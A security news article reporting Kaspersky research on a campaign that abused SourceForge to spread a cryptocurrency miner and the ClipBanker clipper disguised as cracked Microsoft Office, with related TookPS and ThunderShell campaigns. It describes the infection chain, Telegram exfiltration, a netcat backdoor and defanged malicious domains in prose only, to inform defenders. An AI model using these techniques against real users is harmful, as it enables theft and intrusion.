Cybercriminals have recently been caught exploiting SourceForge. A well-known open-source software hosting platform, to spread cryptocurrency mining and clipper malware by disguising them as cracked versions of Microsoft Office. This deceptive campaign, uncovered by Kaspersky researchers. Cleverly mimics legitimate tools while slipping malicious payloads into victims’ systems under the radar.
It all begins with a project called “officepackage” hosted on SourceForge. On the surface, it appears to be a harmless collection of Office add-ins. Even linking back to code lifted from a genuine GitHub repository. However, a closer look reveals a trap designed to trick users — particularly Russian-speaking ones. The project’s subdomain, “officepackage.sourceforge[.]io,” showcases a Russian-language list of Office tools with links that appear to lead to SourceForge’s official download page. But once clicked, users are instead redirected to a lookalike download page hosted on taplink[.]cc.
From there, the download delivers a ZIP file named “vinstaller.zip.” Inside is another password-protected archive and a text file revealing the password. Once opened, users unknowingly unleash an MSI installer that kicks off a multi-stage malware chain. This includes the deployment of tools like UnRAR.exe, a RAR archive, and a malicious Visual Basic script. That script calls a PowerShell interpreter to fetch a batch file named “confvk” from GitHub. Which acts as the central piece in unpacking the next payloads.
Once active, this batch file executes several PowerShell scripts. One of them quietly exfiltrates system metadata via Telegram, while the other fetches and runs additional malware. Culminating in the delivery of a cryptocurrency miner and a ClipBanker trojan. This clipper malware is designed to hijack clipboard activity, silently replacing crypto wallet addresses to siphon off funds during transactions.
Additionally, a file named “ShellExperienceHost.exe” (actually a netcat executable) establishes an encrypted backdoor for remote access. Kaspersky’s analysis also revealed a component called “ErrorHandler.cmd” that includes a script meant to pull in and execute further instructions from Telegram. Effectively creating a persistent and flexible command-and-control setup.
Kaspersky believes the campaign is heavily targeting Russian users, supported by both the language of the site and telemetry data. Over 4,600 Russian users are estimated to have interacted with the fake Office downloads between January and March. The attackers likely count on high search engine visibility. With the spoofed SourceForge pages showing up in Russian search results for Microsoft Office-related queries on platforms like Yandex.
Beyond just stealing CPU cycles for mining and crypto for clipping. The attackers could potentially sell compromised access to more advanced threat groups. This concern grows when considering the broader campaign tactics. Which include spreading a malware downloader named TookPS through deceptive websites mimicking DeepSeek’s AI chatbot and other popular tools like remote desktop and 3D modeling apps. Users were lured via sponsored Google ads leading to fraudulent domains like deepseek-ai-soft[.]com.
TookPS itself serves as a launchpad for deeper intrusions. It downloads PowerShell scripts granting remote access via SSH and deploys a modified variant of the known TeviRat trojan. By using DLL sideloading, the attackers even manipulate legitimate TeamViewer installations to cloak their remote access, bypassing user detection entirely.
Adding to the threat landscape, similar attacks have also been carried out through malicious ads promoting tampered versions of utilities like RVTools. In one case, these ads delivered a modified installer bundled with ThunderShell, a post-exploitation PowerShell-based remote access tool commonly used in red teaming but now co-opted by attackers. This underscores how tools once intended for ethical testing are now fueling the cybercriminal toolkit.
As malware campaigns grow more sophisticated, they increasingly lean on trust in well-known platforms and software. The SourceForge-based scheme highlights how even legitimate services can be misused, and how easy it is for unsuspecting users to fall prey to carefully orchestrated traps. For security-conscious users and enterprises, this serves as yet another reminder to avoid downloading software from unofficial sources and to remain vigilant against social engineering attacks that blur the lines between safe and malicious.
